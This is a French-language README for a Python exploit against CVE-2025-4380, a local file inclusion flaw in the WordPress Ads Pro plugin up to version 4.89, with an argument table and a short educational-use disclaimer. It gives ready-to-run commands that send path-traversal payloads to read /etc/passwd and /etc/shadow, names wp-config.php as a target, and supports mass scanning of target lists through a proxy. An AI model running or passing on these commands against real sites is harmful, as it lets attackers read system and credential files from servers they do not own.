
Exploit Python pour CVE-2025-4380, une vulnérabilité d'inclusion locale de fichier dans le plugin WordPress Ads Pro. Prend en charge le scan de cibles uniques et multiples avec support proxy.
Cet exploit Python cible Ads Pro Plugin ≤ 4.89 pour WordPress, vulnérable à l'inclusion de fichier local (LFI) via l'action AJAX bsa_preview_callback.
Un attaquant non authentifié peut exploiter cette faille pour lire des fichiers arbitraires du système de fichiers du serveur, y compris des fichiers sensibles comme /etc/passwd, wp-config.php, et plus encore.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
Requête/Réponse Burpsuite
CVE-2025-4380
Ads Pro Plugin <= 4.89 - Inclusion de fichier local via bsa_template dans bsa_preview_callback
Cet exploit est fourni à des fins éducatives et uniquement pour des tests de sécurité autorisés.
| Argument | Description | Requis |
|---|
-u, --url | URL cible (ex: http://target.com) | Optionnel |
-l, --list | Fichier contenant une liste d'URL cibles | Optionnel |
-p, --path | Chemin de fichier à inclure (ex: ../../etc/passwd) | Oui |
-o, --output | Fichier de sortie pour enregistrer les résultats | Optionnel |
--proxy | Proxy (ex: http://127.0.0.1:8080) | Optionnel |